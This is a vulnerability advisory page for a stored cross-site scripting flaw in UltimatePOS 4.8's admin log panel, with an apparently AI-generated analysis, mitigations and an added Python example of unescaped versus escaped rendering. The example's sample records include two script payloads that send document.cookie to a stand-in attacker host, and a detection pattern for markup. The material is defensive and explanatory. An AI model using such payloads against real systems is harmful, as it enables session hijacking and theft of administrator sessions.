
CVE-2025-60503: n/a

High
Published: Mon Nov 03 2025 (11/03/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

A cross-site scripting (XSS) vulnerability exists in the administrative interface of ultimatefosters UltimatePOS 4.8 where input submitted in the purchase functionality is reflected without proper escaping in the admin log panel page in the 'reference No.' field. This flaw allows an authenticated attacker to execute arbitrary JavaScript in the context of an administrator's browser session, which could lead to session hijacking or other malicious actions.

AI-Powered Analysis

Last updated: 11/03/2025, 16:17:03 UTC

Technical Analysis

CVE-2025-60503 is a stored cross-site scripting vulnerability in the administrative interface of UltimatePOS 4.8. The CVE description calls the flaw "reflected", but the data flow it describes is a stored one: the 'reference No.' value entered through the purchase functionality is saved with the purchase and later rendered, without proper escaping, in the admin log panel page. Any HTML or JavaScript embedded in that value therefore executes in the browser of whichever administrator opens the log panel, without the victim having to follow an attacker-supplied link.

The attacker needs an authenticated account that is allowed to record purchases; no administrative rights are needed to plant the payload, so the bug is a route from a low-privileged account to administrator-level actions. Once the script runs in the administrator's session it can read whatever that page can read, issue authenticated requests to the application (change settings, alter records, perform any action the administrator's role permits), or exfiltrate session material if the session cookie is readable from JavaScript. No public exploit is reported on this page. The CVE record carries no CVSS score (its CVSS version field is null), so the "High" severity shown above is not derived from a CVSS vector, and no vendor patch or advisory is documented here. Organisations running UltimatePOS 4.8 should treat the issue as exploitable by any user who can create purchases until the vendor confirms a fix.

Potential Impact

For European organisations the practical risk is takeover of the UltimatePOS administrative role from a lower-privileged foothold. Because the payload is planted through an authenticated purchase entry, the likely attackers are insiders who hold purchase rights, or external attackers who have obtained such credentials through phishing or password reuse. Code running in an administrator's session can change point-of-sale configuration, alter or delete transaction records and perform any other action the administrator can, so the consequences are financial loss, tampered sales data, business disruption and, where customer data is exposed, GDPR obligations and reputational damage. A compromised admin interface can also serve as a foothold for lateral movement into the rest of the retail network. Given how widely POS software is deployed across European retail, the issue should be addressed promptly even though exploitation requires an account.

Mitigation Recommendations

Two things limit exposure immediately. First, reduce who can plant the payload: the attacker only needs an account that can record purchases, so review which roles hold purchase rights and remove them from accounts that do not need them; restrict the administrative interface (the log panel in particular) to trusted personnel, and require multi-factor authentication so that phished credentials alone are not enough. Second, reduce what a successful payload can do: confirm the session cookie is set with the HttpOnly and Secure flags so that document.cookie cannot read it (this blocks cookie theft, not actions the script performs from inside the administrator's browser), and, if the application tolerates it, deploy a Content-Security-Policy that disallows inline script.

The durable fix belongs to the vendor: the 'reference No.' value must be HTML-entity encoded where the log panel renders it, with input validation (an allowlist of the characters a reference number can legitimately contain) as a second layer rather than a substitute. Operators of self-hosted installations who cannot wait for a patch can make that change in the relevant view themselves if they are prepared to maintain a local patch. A WAF rule that blocks obvious script payloads in the reference field is a stopgap only: XSS filters are routinely bypassed, and the rule does nothing about payloads already stored. Therefore also audit existing purchase records for reference numbers containing '<', 'javascript:' or on*= event handlers, and monitor administrator sessions for anomalies such as logins from new addresses or unexpected configuration changes. Staff awareness of phishing lowers the chance of an attacker obtaining a purchase-capable account. Ask the vendor (ultimatefosters) for a fixed release and apply it as soon as it is available; network segmentation that isolates POS systems and their administrative interfaces limits what a compromised admin session can reach.
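The flaw and its countermeasures in runnable form, as an added example that is not UltimatePOS code and does not reflect that application's internals (Python is used so it runs stand-alone; the same logic transfers to the application's own templating layer): a vulnerable render function that concatenates the stored 'reference No.' into HTML, the hardened version that entity-encodes it at render time, an input allowlist as a second layer, and a scanner that flags already-stored reference numbers carrying markup, which is the audit step recommended above. The sample purchase records, the allowlist pattern and the detection regex are constructed for the example.

```python
"""Added example (not UltimatePOS code): vulnerable vs. hardened rendering of a
stored 'reference No.' value, an input allowlist, and an audit scanner for
reference numbers that already carry markup."""
import html
import re

# Constructed sample purchase records, as an attacker with purchase rights
# could submit them. Not real UltimatePOS data.
SAMPLE_PURCHASES = [
    {"id": 1, "ref_no": "PO2025-0001"},
    {"id": 2, "ref_no": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"},
    {"id": 3, "ref_no": "<img src=x onerror=\"fetch('https://attacker.example/'+document.cookie)\">"},
    {"id": 4, "ref_no": "PO-2025/0004"},
]

# Assumed allowlist for a legitimate reference number (letters, digits, a few
# separators, at most 50 characters). Tune to the deployment's numbering scheme.
REF_NO_PATTERN = re.compile(r"[A-Za-z0-9][A-Za-z0-9_./-]{0,49}")

# Deliberately broad markers of markup or script inside a stored value. Matches
# are candidates for manual review, not proof of an attack.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=|&#x?[0-9a-f]+;", re.IGNORECASE
)


def render_log_row_vulnerable(ref_no: str) -> str:
    """Mirrors the flaw: the stored value is dropped into HTML unescaped."""
    return f"<td class=\"ref-no\">{ref_no}</td>"


def render_log_row_fixed(ref_no: str) -> str:
    """Hardened form: entity-encode at render time. quote=True also encodes
    ' and ", so the output is safe inside attribute values, not only text nodes."""
    return f"<td class=\"ref-no\">{html.escape(ref_no, quote=True)}</td>"


def validate_ref_no(ref_no: str) -> bool:
    """Input-side layer: accept only allowlisted reference numbers. This
    narrows the attack surface but does not replace output encoding."""
    return REF_NO_PATTERN.fullmatch(ref_no) is not None


def scan_stored_references(purchases: list[dict]) -> list[int]:
    """Audit step: return ids of records whose reference number looks like
    markup or script. Run over an export of the purchase table to find
    payloads that were stored before the fix was applied."""
    return [p["id"] for p in purchases if SUSPICIOUS.search(p["ref_no"])]


if __name__ == "__main__":
    for p in SAMPLE_PURCHASES:
        print(p["id"], validate_ref_no(p["ref_no"]), render_log_row_fixed(p["ref_no"]))
    print("suspicious records:", scan_stored_references(SAMPLE_PURCHASES))
```

Note that the scanner is intentionally broad (a reference number containing a literal "<" is unusual but not impossible), so treat its hits as a review queue; the allowlist is the stricter control, and the output encoding is the one that actually closes the vulnerability.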


Technical Details

Data Version: 5.2
Assigner Short Name: mitre
Date Reserved: 2025-09-26T00:00:00.000Z
CVSS Version: null (no score assigned)
State: PUBLISHED

Threat ID: 6908d4e3bdcf00867c5ae6e0

Added to database: 11/3/2025, 4:14:27 PM

Last enriched: 11/3/2025, 4:17:03 PM

Last updated: 11/3/2025, 8:32:49 PM
